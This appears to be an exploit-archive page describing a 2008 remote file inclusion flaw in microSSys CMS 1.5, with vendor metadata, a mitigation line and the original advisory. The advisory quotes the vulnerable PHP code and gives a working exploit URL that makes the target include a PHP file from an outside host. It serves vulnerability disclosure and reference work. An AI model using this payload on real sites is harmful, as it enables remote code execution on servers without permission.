microSSys CMS - exploit.company

vendor:

microSSys CMS

by:

Raz0r

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: microSSys CMS

Affected Version From: 1.5

Affected Version To: 1.5

Patch Exists: YES

Related CWE: N/A

CPE: a:wajox:microssys_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

microSSys CMS <= 1.5 Remote File Inclusion Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the '1' and 'PAGES[lol]' parameters to the 'index.php' script. This can be exploited to execute arbitrary PHP code by including a remote file with a specially crafted URL.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.

Source

Exploit-DB raw data:

## microSSys CMS <= 1.5 Remote File Inclusion Vulnerability
## Software site: http://wajox.com/
## ===============================================================
##                   By Raz0r (www.Raz0r.name)
## ===============================================================
## Vulnerable code (index.php@22-25,54-55):
## [22] if(isset($_REQUEST["1"])){
## [23] $P=$_REQUEST["1"];}else{
## [24] $P="main";
## [25] }
## [..]
## [54] if(isset($PAGES[$P])){}else{include("TH.txt");}
## [55] @include($PAGES[$P]);
## Nice...
## ===============================================================
## Exploit:
## http://host/index.php?1=lol&PAGES[lol]=http://raz0r.name/s.php
## =============================================================== 

# milw0rm.com [2008-05-19]